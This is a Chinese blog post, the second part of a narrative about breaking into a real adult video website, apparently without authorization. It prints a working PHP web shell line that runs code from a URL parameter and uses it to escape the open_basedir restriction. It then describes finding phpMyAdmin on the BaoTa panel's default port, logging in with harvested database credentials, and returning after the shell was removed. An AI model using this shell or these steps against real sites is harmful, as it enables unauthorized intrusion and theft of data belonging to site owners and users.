主页 > 网络知识 > 对一次宅男网站的渗透(2)

对一次宅男网站的渗透(2)

 

对一次宅男网站的渗透

 

0x02 深入绕过open_basedir:

发现目标不能访问根目录,查看一下phpinfo发现open_basedir函数限制了访问目录:

 

对一次宅男网站的渗透

 

使用代码:

<?php echo 'open_basedir: '.ini_get('open_basedir').'<br>'; echo 'GET: '.$_GET['c'].'<br>'; eval($_GET['c']); echo 'open_basedir: '.ini_get('open_basedir'); ?>

成功突破目录限制:

 

对一次宅男网站的渗透

通过敏感信息收集读取到日志文件,发现目标存在phpmyadmin:

 

 

对一次宅男网站的渗透

得到目录phpmyadmin路径后判断出目标使用了宝塔,宝塔一般默认把phpmyadmin搭建在888端口上面:

 

 

对一次宅男网站的渗透

 

找到数据库密码,登录之:

 

对一次宅男网站的渗透

80多万访问IP这网站有点逆天,播放次数那么多的那位老哥,注意身体啊,由于MySQL权限不够,于是不考虑继续利用MySQL:

 

 

对一次宅男网站的渗透

 

0x03 再探绕过宝塔防火墙:

由于某些原因,渗透搁置了一段时间,再次来看的时候发现马被删除了,重新拿shell的时候发现对方开了宝塔的防火墙

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!